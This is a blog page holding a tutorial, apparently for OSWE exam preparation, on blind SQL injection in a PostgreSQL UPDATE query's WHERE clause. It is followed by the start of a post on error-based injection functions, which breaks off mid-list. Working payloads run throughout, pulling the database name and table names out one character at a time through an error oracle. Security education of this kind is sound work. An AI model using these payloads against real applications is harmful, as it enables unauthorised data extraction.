Start With Linux | Mannu Linux (cyb3r.gladiat0r) - Blind SQL Injection in update query for OSWE - PostgreSQL Database (2024-03-18) <p><span style="font-family: "Expletus Sans";">Pranaam to all <span style="font-size: x-large;">🙏</span></span></p><p><span style="font-family: Expletus Sans;">In this blog post we are gonna explore an approach to exploiting a SQL Injection in the WHERE clause of an UPDATE query. </span></p><p><span style="font-family: Expletus Sans;">Following are the assumptions:</span></p><p><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> Injection point - Where clause of an Update query. </span></p><p><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> Stacked queries are not allowed.</span></p><p><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> The web application does not show DB error messages, only a generic success or failure response.</span></p><p><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> Blind injection is possible.</span></p><p><span style="font-family: Expletus Sans;">Just one meme before proceeding to the explanation<span style="font-size: large;"> 😅</span></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizE4w2o8fRI1XHPKIsNJuruU2y79aoUiBY_F8wLZvF-gjuYcqIzEqQU611PGfevhR567hwf36CRC5gGrX-K8QfJD99uGnUb9bo-6FvynX3FxqF4Ca61pCidx7YuMj5i2dl908ZAeZRCBFH91mHbMJJ5VwPju5mlme4_rlYd6NdLwaGOFu5XZw_58NCsdY/s1280/one.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizE4w2o8fRI1XHPKIsNJuruU2y79aoUiBY_F8wLZvF-gjuYcqIzEqQU611PGfevhR567hwf36CRC5gGrX-K8QfJD99uGnUb9bo-6FvynX3FxqF4Ca61pCidx7YuMj5i2dl908ZAeZRCBFH91mHbMJJ5VwPju5mlme4_rlYd6NdLwaGOFu5XZw_58NCsdY/s16000/one.png" /></a></div><br /><p><br /></p><p><span style="color: #fcff01; font-family: verdana; font-size: large;"><u style="background-color: black;">Update Query injection - Integer based </u></span></p><p><span style="font-family: Expletus Sans;">The vulnerable SQL query is as follows (the user-supplied value is concatenated straight into the WHERE clause):</span></p>
<pre><textarea cols="20" rows="2" style="height: 27px; width: 505px;"> UPDATE indishell_admins SET active=1 WHERE id= User_Supplied_Data</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkkO67ExEcayFOAZkHljcyx8j1VLrIievGCRon4g-BuUn7KkO-mxvhgiZ48ONnCJGn2h6BmQmIyhbm6PoAccv0AJOKhtVJsehCyNM3WfYfWv80lDVrJ_BfaSRarhifDYePp96dOxAr_GkJwqrY7EcUJeUzUQqpb23gl5jpaHzUA9KxXipDBylau2oTC3A/s1244/u1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="1244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkkO67ExEcayFOAZkHljcyx8j1VLrIievGCRon4g-BuUn7KkO-mxvhgiZ48ONnCJGn2h6BmQmIyhbm6PoAccv0AJOKhtVJsehCyNM3WfYfWv80lDVrJ_BfaSRarhifDYePp96dOxAr_GkJwqrY7EcUJeUzUQqpb23gl5jpaHzUA9KxXipDBylau2oTC3A/s16000/u1.png" /></a></div><span style="font-family: Expletus Sans;">Upon successful execution of the Update query, the API responds with a success message. 
</span><div><span style="font-family: Expletus Sans;">If something goes wrong, the response looks like this:</span></div><div><span style="font-family: "Expletus Sans";"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjggkxRtGlcJ9EoCtup_dLa5nBYMYKSQWVVRf7V6FJc0r8wwhVwfpO_3aFENt0Fml4JCmgaqs3165uhvQb_SK00HuJDnCa5KKr-792cEuKaB0h2GZEiYcK5668HrCIRPflQrIgg9yMrsx2Cx0KLN9wUhMEU1K-ghNwWAQU6ff7ARNo1gfYUCs4dxA_N-Q/s1296/u2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="1296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjggkxRtGlcJ9EoCtup_dLa5nBYMYKSQWVVRf7V6FJc0r8wwhVwfpO_3aFENt0Fml4JCmgaqs3165uhvQb_SK00HuJDnCa5KKr-792cEuKaB0h2GZEiYcK5668HrCIRPflQrIgg9yMrsx2Cx0KLN9wUhMEU1K-ghNwWAQU6ff7ARNo1gfYUCs4dxA_N-Q/s16000/u2.png" /></a></div><br /><span><span style="background-color: black;"><b><span style="color: #fcff01;"><u><span style="font-size: large;">How to solve this puzzle</span></u><span style="font-size: medium;"> </span></span></b></span></span></span></div><div><span style="font-family: "Expletus Sans";"><br /></span></div><div><span style="font-family: Expletus Sans;">To exploit such an endpoint, we are going to use the following type of payload in place of the integer id:</span></div><div><span style="font-family: Expletus Sans;"><br /></span></div><div><span style="font-family: Expletus Sans;"><pre><textarea cols="20" rows="2" style="height: 47px; width: 605px;"> (select 1 from user where data_extraction_payload+comparison or
Payload_which_causes_an_SQL_server_exception_or_returns_multiple_rows)</textarea></pre></span></div><div><span style="font-family: Expletus Sans;"><br /></span></div><div><span style="color: #fcff01; font-family: Expletus Sans;"><b style="background-color: black;">Why this approach:</b></span></div><div><span style="color: #fcff01; font-family: Expletus Sans;"><b><br /></b></span></div><div><span style="font-family: Expletus Sans;">Well, when we are performing blind SQL Injection exploitation against this query:</span></div><div><span style="font-family: Expletus Sans;"><br /></span></div><div><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> If the condition/comparison we specify is true, the subquery returns 1, the UPDATE runs normally and the user sees the generic "success" message</span></div><div><span style="font-family: Expletus Sans;">else </span></div><div><span style="font-family: Expletus Sans;"><span style="font-size: x-large;">👉</span> the OR forces the query to evaluate the payload that causes an error, so no update operation is performed. 
When the update query encounters an error, the web API code shows the generic error message.</span></div><div><span style="font-family: Expletus Sans;">Two details make this work. First, <span style="color: #ffa400;">user</span> in "from user" is a PostgreSQL keyword equivalent to current_user; used in a FROM clause it yields exactly one row, so the subquery needs no known table name. Second, the error-causing branch is essential: without it a false comparison would simply make the subquery return no row, id would be compared with NULL, nothing would be updated and no error would occur, leaving nothing to observe.</span></div><div><span style="font-family: Expletus Sans;"><br /></span></div><div><span style="font-family: Expletus Sans;">Here is our sample payload: </span></div><div><span style="font-family: Expletus Sans;"><pre><textarea cols="20" rows="2" style="height: 31px; width: 570px;">(select 1 from user where 1=1 or has_database_privilege(1337,'b0x'))</textarea></pre></span></div><div><pre><br /></pre><pre><span style="font-family: Expletus Sans;">Let's break down the payload to understand its different parts.</span></pre><pre><span style="font-family: "Expletus Sans"; font-size: x-large;">👉</span> Data extraction/comparison part of the payload: </pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 205px;">where something=something </textarea></span></pre><pre><span style="font-family: Expletus Sans;">To perform blind SQL Injection exploitation, we perform the comparison in this part. </span></pre><pre><span style="font-family: Expletus Sans;">If the comparison returns true, the web API returns the "Success" message.</span></pre><pre><span style="font-family: "Expletus Sans"; font-size: x-large;">👉</span> <span style="font-family: Expletus Sans;">Exception-causing part: </span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 305px;">OR has_database_privilege(1337,'b0x')</textarea></span></pre><pre><span style="font-family: Expletus Sans;">This part of the payload comes into action when the condition in the data extraction/comparison part is not true. PostgreSQL does not formally guarantee left-to-right short-circuit evaluation of OR operands, but it behaves that way here, as the requests below confirm. 
</span></pre><pre><span style="font-family: Expletus Sans;">This expression always causes an exception because the second argument of <span style="color: #ffa400;">has_database_privilege()</span> must be a valid database privilege name (such as CONNECT), whereas we pass the string 'b0x'; PostgreSQL rejects it with unrecognized privilege type: "b0x".</span></pre><pre><span style="font-family: Expletus Sans;"><br /></span></pre><pre><span style="font-family: Expletus Sans;"><span style="background-color: black; white-space: normal;"><b style="font-size: x-large;"><span style="color: #fcff01;"><u>Exploitation time</u> </span></b><span style="font-size: x-large;">🤘</span></span><span style="font-size: x-large; white-space: normal;">😎🤘</span></span></pre><pre><span style="font-family: Expletus Sans;">First of all, let's verify whether our payload works as expected:</span></pre><pre><span style="color: #fcff01; font-family: Expletus Sans;">True condition:</span></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT-d4EUCX9wB0tiLrhecRT_XigBmCokLp2s9s3X8C3DdxxAzMgOb6B4TpdcsJn0KEzyjSXQPC2VezcluEfn9d8nkWDS5OqeXIW_hoeS4BgQNe2JbzSv_ExPvelHZI45eOwIYImilNkVeXJYnfc0ZeTN4Lqs_KMdnGAU1NOMW2_B97hgEn6EYSyfCi72Tk/s1416/u3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="483" data-original-width="1416" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT-d4EUCX9wB0tiLrhecRT_XigBmCokLp2s9s3X8C3DdxxAzMgOb6B4TpdcsJn0KEzyjSXQPC2VezcluEfn9d8nkWDS5OqeXIW_hoeS4BgQNe2JbzSv_ExPvelHZI45eOwIYImilNkVeXJYnfc0ZeTN4Lqs_KMdnGAU1NOMW2_B97hgEn6EYSyfCi72Tk/s16000/u3.png" /></a></div><pre><br /></pre><pre><span style="color: #fcff01; font-family: Expletus Sans;">False condition:</span></pre><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNw_1hFZDTrJhtTXxdapFcUMLRJUK-IkaSLjDRKgwxYFdgxLvywQLoND299GSzHyeyvXQaxpKCXqAVFjA3TPw-HjWOB0gk1fRPtP9i_4hlbcdOoSdI4B3jGL-WL3iS0VnnMwPTrw8LVp8uEvY01hSniquh4BYnn_Jpb_EP9XQeV393RWJxsj19aBwz9wM/s1409/u4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="1409" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNw_1hFZDTrJhtTXxdapFcUMLRJUK-IkaSLjDRKgwxYFdgxLvywQLoND299GSzHyeyvXQaxpKCXqAVFjA3TPw-HjWOB0gk1fRPtP9i_4hlbcdOoSdI4B3jGL-WL3iS0VnnMwPTrw8LVp8uEvY01hSniquh4BYnn_Jpb_EP9XQeV393RWJxsj19aBwz9wM/s16000/u4.png" /></a></div><br /><pre><span style="color: #ffa400; font-family: Expletus Sans;">Extracting the database name</span></pre><pre><span style="font-family: Expletus Sans;">The expression below extracts the first character of the database name and converts it into its ASCII value:</span></pre><pre><textarea cols="20" rows="2" style="height: 27px; width: 305px;">ascii(substring(current_database(),1,1))</textarea></pre><pre><span style="font-family: Expletus Sans;">Now, put it into our payload and start comparing against it. The final payload looks like this:</span></pre><pre><textarea cols="20" rows="2" style="height: 65px; width: 500px;">(select 1 from user
where some_ASCII_value < ascii(substring(current_database(),1,1))
or has_database_privilege(1337,'b0x'))</textarea></pre><pre><span style="font-family: Expletus Sans;">The name of the current database is "box", so the ASCII value of the first character of the database name is 98 (b).</span></pre><pre><span style="font-family: Expletus Sans;">Let's ask the DB whether that ASCII value is greater than 90, using the payload below:</span></pre><pre><textarea cols="20" rows="2" style="height: 65px; width: 400px;"> (select 1 from user
where 90 < ascii(substring(current_database(),1,1))
or has_database_privilege(1337,'b0x'))</textarea><br /></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr5YcGBU8rxpGV3VHYuZl2fwI5R1nif28X2IeWWPZqdt738BFM5hDekyOtodpl0OVn22y4BuNZ3ABkD0NpTqtjYx78Whay5OiYVEAL1HvblxqahVmVRMcjt-8LF0HdaZyPebIeq7lrKbueTjVc9QiLNoU_lNu-gNgpzizEJ7V6D1kwD8-epnlcZm2bhSQ/s1310/u5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="404" data-original-width="1310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr5YcGBU8rxpGV3VHYuZl2fwI5R1nif28X2IeWWPZqdt738BFM5hDekyOtodpl0OVn22y4BuNZ3ABkD0NpTqtjYx78Whay5OiYVEAL1HvblxqahVmVRMcjt-8LF0HdaZyPebIeq7lrKbueTjVc9QiLNoU_lNu-gNgpzizEJ7V6D1kwD8-epnlcZm2bhSQ/s16000/u5.png" /></a></div><br /><pre><span style="font-family: Expletus Sans;">The web API response shows that the update succeeded, which means the ASCII value of the first character of the DB name is greater than 90.</span></pre><pre><span style="font-family: Expletus Sans;">Now let's check whether the ASCII value of the first character of the database name is greater than 100, using the payload below:</span></pre><pre><textarea cols="20" rows="2" style="height: 65px; width: 400px;"> (select 1 from user
where 100 < ascii(substring(current_database(),1,1))
or has_database_privilege(1337,'b0x'))</textarea><br /></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq_h_J3PLbbH0GV79aBRn_Fun8CWL9GEgWq5sdWyH4Ut4cJTBytL4ZYvsw0DCc6Q6R5sn4LyepJwnI8t0ulT0u5apcZ8w7OMcU-dxx2zDe6qg2qGS0n5AIymr9dHBvpwzq04vM1P4x82VqAjtLBqBWEqr4QerbEIOzYB6SLWqKw9eRC8QPdcCAbQfbSoM/s1312/u6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="468" data-original-width="1312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq_h_J3PLbbH0GV79aBRn_Fun8CWL9GEgWq5sdWyH4Ut4cJTBytL4ZYvsw0DCc6Q6R5sn4LyepJwnI8t0ulT0u5apcZ8w7OMcU-dxx2zDe6qg2qGS0n5AIymr9dHBvpwzq04vM1P4x82VqAjtLBqBWEqr4QerbEIOzYB6SLWqKw9eRC8QPdcCAbQfbSoM/s16000/u6.png" /></a></div><br /><pre><span style="font-family: Expletus Sans;">No: the API response shows that the update query could not perform the operation. The ASCII value of the first character of the database name is 98, which is not greater than 100, so the other operand of the OR, has_database_privilege(1337,'b0x'), was evaluated and raised an exception. </span></pre><pre><span style="font-family: Expletus Sans;">Now, instead of less-than/greater-than comparisons, try the equality operator with 98 and check the API response to confirm we are going in the right direction. Use the payload below:</span></pre><pre><textarea cols="20" rows="2" style="height: 65px; width: 400px;"> (select 1 from user
where 98 = ascii(substring(current_database(),1,1))
or has_database_privilege(1337,'b0x'))</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqKIcDwsPMN2U-EoIggxiRPFE4bchW4TE-h3p2MSrJP94mT77PPEcXhrD-nglz83pl_5IFEa_25y8x_jhn4o5xxSlPUJtGlH7YhzX9oXZD21mLv6e9sRc7Pdpir1LBTLGbPWAOIIcm3PTYOYn8QdNF73ijvK8qL7Pjm5zHApthDrf1-QX6YLN_RC-BPoo/s1284/u7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="1284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqKIcDwsPMN2U-EoIggxiRPFE4bchW4TE-h3p2MSrJP94mT77PPEcXhrD-nglz83pl_5IFEa_25y8x_jhn4o5xxSlPUJtGlH7YhzX9oXZD21mLv6e9sRc7Pdpir1LBTLGbPWAOIIcm3PTYOYn8QdNF73ijvK8qL7Pjm5zHApthDrf1-QX6YLN_RC-BPoo/s16000/u7.png" /></a></div><pre><span style="font-family: Expletus Sans;">To extract the ASCII value of the next character, we need to make a small change to the payload: increment the second argument of substring() by one.</span></pre><pre><span style="font-family: Expletus Sans;">That is, we change </span></pre><pre><span style="font-family: Expletus Sans;"><span style="color: #ffa400;">ascii(substring(current_database(),</span><b><span style="color: white;">1</span></b><span style="color: #ffa400;">,1))</span> </span></pre><pre><span style="font-family: Expletus Sans;">to </span></pre><pre><span style="font-family: Expletus Sans;"><span style="color: #ffa400;">ascii(substring(current_database(),</span><b><span style="color: white;">2</span></b><span style="color: #ffa400;">,1)) </span></span></pre><pre><span style="font-family: Expletus Sans;">And the payload becomes:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 65px; width: 400px;"> (select 1 from user
where 98 = ascii(substring(current_database(),2,1))
or has_database_privilege(1337,'b0x'))</textarea></span></pre><pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyFBEkTGQj8ARSZccxIPoWm18qSufAB_e4EO-NVheXQCf2ldzi8_rIbAgfX87KTdhU2MEdQtTK6YEJCEtPqPS02yMNYXDvwLYAaG-7OP1c2wOwhiyAfwWhyphenhyphenxh9AHU6k_x7wqcRQ-Ux4-bcJzXAtmnvWco0Tm0CNgdlmgKOqu2YJSc9OuRh1GadoM3kbhw/s1133/u8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="386" data-original-width="1133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyFBEkTGQj8ARSZccxIPoWm18qSufAB_e4EO-NVheXQCf2ldzi8_rIbAgfX87KTdhU2MEdQtTK6YEJCEtPqPS02yMNYXDvwLYAaG-7OP1c2wOwhiyAfwWhyphenhyphenxh9AHU6k_x7wqcRQ-Ux4-bcJzXAtmnvWco0Tm0CNgdlmgKOqu2YJSc9OuRh1GadoM3kbhw/s16000/u8.png" /></a></div><br /><span style="font-family: Expletus Sans;">There we go! The payload now targets the second character. (The second character of "box" is 'o', ASCII 111, so this particular equality check with 98 evaluates to false.)</span></pre><pre><span style="font-family: Expletus Sans;">To pin down the second character, repeat the same greater-than/less-than narrowing we used to figure out the first character.</span></pre><pre><span style="font-family: Expletus Sans;"><pre><span style="color: #ffa400; font-family: Expletus Sans;">Extracting table names from the current DB</span></pre></span></pre><pre><span style="font-family: Expletus Sans;">To extract the table names, we need to consider the following steps:</span></pre><pre><span style="font-family: Expletus Sans;">Step 1<span style="font-size: large;">👉</span> Run a SQL query that extracts the name of only one table at a time, say the first table. 
</span></pre><pre><span style="font-family: Expletus Sans;">Step 2<span style="font-size: large;">👉</span> From the extracted table name, take the first character using substring( )</span></pre><pre><span style="font-family: Expletus Sans;">Step 3<span style="font-size: large;">👉</span> Convert that character into its ASCII value</span></pre><pre><span style="font-family: Expletus Sans;">Step 4<span style="font-size: large;">👉</span> Perform comparisons against ASCII values to figure out the ASCII value of the first character </span></pre><pre><span style="font-family: Expletus Sans;">Step 5<span style="font-size: large;">👉</span> Once we know the first character, go back to step 2 and change the position in substring( ) to extract the next character</span></pre><pre><span style="font-family: Expletus Sans;">Step 6<span style="font-size: large;">👉</span> Follow steps 3 and 4 to figure out the second character.</span></pre><pre><span style="font-family: Expletus Sans;">Step 7<span style="font-size: large;">👉</span> To extract the next table name, go back to step 1 and change the offset from 0 to 1.</span></pre><pre><span style="font-family: Expletus Sans;">Step 8<span style="font-size: large;">👉</span> Follow steps 2 to 6 to find out the name of the second table.</span></pre><pre><span style="font-family: Expletus Sans;"><br /></span></pre><pre><span style="color: #fcff01; font-family: Expletus Sans;">Payload to extract the name of the first table from the information schema:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 526px;"> select table_name from information_schema.tables limit 1 offset 0</textarea></span></pre><pre><span style="font-family: Expletus Sans;">If we want to go for another table, we change the value of the offset. Note that without an ORDER BY the row order is not guaranteed to stay the same between requests, and information_schema.tables also lists system tables, so add a table_schema filter if the names you recover are not the application's. 
</span></pre><pre><span style="font-family: Expletus Sans;">For example, </span></pre><pre><span style="font-family: Expletus Sans;">for the second table it becomes offset 1</span></pre><pre><span style="font-family: Expletus Sans;">for the third table, offset 2</span></pre><pre><span style="font-family: Expletus Sans;">for the fourth table, offset 3 </span></pre><pre><span style="font-family: Expletus Sans;">and so on....</span></pre><pre><span style="font-family: Expletus Sans;">Extracting a character and converting it are done with substring( ) and ascii( ) respectively, exactly as before.</span></pre><pre><span style="font-family: Expletus Sans;">Our final payload looks like this:</span></pre><pre><span style="font-family: Expletus Sans;"> <textarea cols="20" rows="2" style="height: 57px; width: 756px;"> (select 1 from user
where 90 < (select ascii(substring(table_name,1,1)) from information_schema.tables limit 1 offset 0)
or has_database_privilege(1337,'b0x'))</textarea></span></pre><pre><span style="font-family: Expletus Sans;">The first table name is admins, so the ASCII value of its first character, which the payload extracts, is 97 (a value greater than 90).</span></pre><pre><span style="font-family: Expletus Sans;">When the request was sent to the API, the following response confirmed our theory:</span></pre><pre><span style="font-family: Expletus Sans;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNZjIyZ3BmxmV9wEbGMhn5gvliPv3EzDHfYg_aM8NJ1k4HYoUtIBK36IexT5xrXyzH6ewXUn5KXNfkFPbeeK3o1l1F3IA1azItfVTLEbGKdBVzgjER6aC0z9j7iDXVfBQbq3_nXMr34Y-oXmMZt-W8kQ1DUheuHNe7QH-7X_4lfLtxc_bnSeMT1CJeuAY/s1188/u9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="1188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNZjIyZ3BmxmV9wEbGMhn5gvliPv3EzDHfYg_aM8NJ1k4HYoUtIBK36IexT5xrXyzH6ewXUn5KXNfkFPbeeK3o1l1F3IA1azItfVTLEbGKdBVzgjER6aC0z9j7iDXVfBQbq3_nXMr34Y-oXmMZt-W8kQ1DUheuHNe7QH-7X_4lfLtxc_bnSeMT1CJeuAY/s16000/u9.png" /></a></div>Let's try with ASCII value 100 (97 is not greater than 100, so the error branch should fire) and see the response:</span></pre><pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQKD1KMYeAPJ2Nqqx5JIw9n246_ulI4pIKNIz-BspkVK24AcG4jY52S_V7UwF2QO0KQ1mxEBJ0DNjlx4FcbQAGYmvgxVblcxc5lVNUz9e1spO2qiWrEF9BlGKAbzEP-iHto2lRkjSCD7Y5-7zAxNeNtbiVOMqPdrtDaRDwHV-MAuAzRRJEajKDIabxX7g/s1190/u10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="395" data-original-width="1190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQKD1KMYeAPJ2Nqqx5JIw9n246_ulI4pIKNIz-BspkVK24AcG4jY52S_V7UwF2QO0KQ1mxEBJ0DNjlx4FcbQAGYmvgxVblcxc5lVNUz9e1spO2qiWrEF9BlGKAbzEP-iHto2lRkjSCD7Y5-7zAxNeNtbiVOMqPdrtDaRDwHV-MAuAzRRJEajKDIabxX7g/s16000/u10.png" /></a></div><br /><span 
style="font-family: Expletus Sans;">It's working!</span></pre><pre><span style="font-family: Expletus Sans;">Now try the equality operator and see whether it works:</span></pre><pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQWWIj1bBMMvWF33RQzI3lQPoSBl8L2qBT1mBn_ZliMEC3JSEDc6GFdCmeP7sSmiI765Z5md5460MdHuB449jLxUaaPinkiN2qmeyg3ofqiLtZRMaZBCtR9jtT3vfQmNz6a1G3zXCL8wg-y5eDkU3RmafpMQov5MkI-kByrMweoRPlNcRtahDsRnBkdrI/s1189/u11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="392" data-original-width="1189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQWWIj1bBMMvWF33RQzI3lQPoSBl8L2qBT1mBn_ZliMEC3JSEDc6GFdCmeP7sSmiI765Z5md5460MdHuB449jLxUaaPinkiN2qmeyg3ofqiLtZRMaZBCtR9jtT3vfQmNz6a1G3zXCL8wg-y5eDkU3RmafpMQov5MkI-kByrMweoRPlNcRtahDsRnBkdrI/s16000/u11.png" /></a></div><br /><span style="font-family: Expletus Sans;">Done <span style="font-size: large;">😎</span> Now let's extract the next character of the first table name.</span></pre><pre><span style="font-family: Expletus Sans;">Here, the payload needs a modification in the second argument of substring( ), i.e. substring(table_name,<span style="color: white;">1</span>,1) becomes substring(table_name,<span style="color: white;">2</span>,1)<br />The payload to extract the second character is:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 57px; width: 756px;"> (select 1 from user
where 90 < (select ascii(substring(table_name,2,1)) from information_schema.tables limit 1 offset 0)
or has_database_privilege(1337,'b0x'))</textarea> </span></pre><pre><span style="font-family: Expletus Sans;">To extract the second character of the first table name, repeat the same steps we followed for the first character.</span></pre><pre><span style="background-color: black; color: #fcff01; font-family: Expletus Sans;">Payload to extract the name of the second table from the information schema:</span></pre><pre><span style="font-family: Expletus Sans;">As mentioned earlier, when performing blind SQL Injection we need to specify which table we want to extract; limit and offset do that for us.</span></pre><pre><span style="font-family: Expletus Sans;">Sample payload which extracts the name of the second table of the current database:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 556px;"> select table_name from information_schema.tables limit 1 offset 1</textarea></span></pre><pre><span style="font-family: Expletus Sans;">To extract the name of the third table, the payload is:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 556px;"> select table_name from information_schema.tables limit 1 offset 2 </textarea></span></pre><pre><span style="font-family: Expletus Sans;">As we are interested in the first character of the second table name, we pass the table name to substring( ) and ascii( ) to get it.</span></pre><pre><span style="font-family: Expletus Sans;">The payload is:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 57px; width: 756px;"> (select 1 from user
where 90 < (select ascii(substring(table_name,1,1)) from information_schema.tables limit 1 offset 1)
or has_database_privilege(1337,'b0x'))</textarea><br /></span></pre><pre><span style="font-family: Expletus Sans;">Keep changing the ASCII value in the comparison and observe the API response.</span></pre><pre><span style="font-family: Expletus Sans;">For now, we are done and I will be back with some new stuff.
Thanks for your time.
With Love from </span></pre><pre><span style="font-family: Expletus Sans;"><span style="font-size: large;">❤️</span> --==[[ Indishell Lab ]]==-- </span><span style="font-size: large;">❤️</span></pre><pre><br /><span style="font-family: Expletus Sans;"></span></pre></div>
Mannu Linux - New payloads to exploit Error-based SQL injection - PostgreSQL database (2023-12-26)<p> <span>Pranaam to all </span><span style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">🙏</span></p><p><span>In the <a href="https://www.mannulinux.org/2023/12/New-payload-to-exploit-Error-based-SQL-injection-Oracle-database.html" target="_blank"><span style="color: #fcff01;">previous blog post</span></a> we explored a new payload to exploit error-based SQL injection in an Oracle database. </span>Now let's go for the PostgreSQL side, which is what I was working on initially.</p><p>Before proceeding, just one meme 😅 </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-OS2f-mXfdaYpguMckC9BXz2Etxgn6-LaGzwnRYqd5NWvwb7jC2IpATiZ34y0ik3dkW3VIfGT5MRurL9azWIg89WnR-7n0JQiGxwZjwgpNdrpCdF341rIYrAP3v7Ii6RDNp-zaWuKNHfpLWwBEfjt5nexYekBXPY_FILCqxF0ksLfGDTAwKwIS5cACno/s1280/one.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-OS2f-mXfdaYpguMckC9BXz2Etxgn6-LaGzwnRYqd5NWvwb7jC2IpATiZ34y0ik3dkW3VIfGT5MRurL9azWIg89WnR-7n0JQiGxwZjwgpNdrpCdF341rIYrAP3v7Ii6RDNp-zaWuKNHfpLWwBEfjt5nexYekBXPY_FILCqxF0ksLfGDTAwKwIS5cACno/s16000/one.png" /></a></div><p><br /></p><p><span style="color: #fcff01; font-size: large;"><b style="background-color: black;">Lab setup:</b></span></p><p><span> </span>👉 PHP </p><p><span> </span>👉 PostgreSQL Database</p><p><span> </span>👉 Apache web server</p><p>Sample vulnerable PHP code and a database dump are available on my Github account:</p><p><a href="https://github.com/incredibleindishell/SQLI_b0x/tree/main/PostgreSQL"><span 
style="color: #f1c232;">https://github.com/incredibleindishell/SQLI_b0x/tree/main/PostgreSQL</span></a></p><p>In my case, I have a vulnerable API with the following scenarios:</p><p><span style="color: #ffa400; font-size: medium;"><u>Select statement:</u></span></p><p><span> </span>👉 <span style="color: #fcff01; font-size: medium;">Where clause</span></p><p><span> </span>👉 <span style="color: #fcff01; font-size: medium;">Like clause</span></p><p><span style="color: #fcff01; font-size: medium;"><span style="color: black; font-size: medium;"> </span><span style="color: black; font-size: medium;">👉 </span><span style="font-size: medium;">Order by</span><span style="color: #fcff01; font-size: medium;"> clause</span></span></p><p><span> </span><br /></p><p><b style="background-color: black; color: #fcff01; font-size: x-large;">Functions which are our friends 😍</b></p><p><span style="font-size: large;"><span style="color: #fcff01;"><b style="background-color: black;"></b></span></span></p><p>During the experiment phase, I found multiple database functions that can be used to exploit error-based SQL Injection in a PostgreSQL database: each one raises an error that echoes its (attacker-controlled) argument back.</p><p>Here goes the list:</p><p style="text-align: left;"></p><ol style="text-align: left;"><li><span style="color: #fcff01; font-family: Expletus Sans;">box</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">currval</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">setval</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">nextval</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">polygon</span></li><li><span style="color: #fcff01; font-family: Expletus 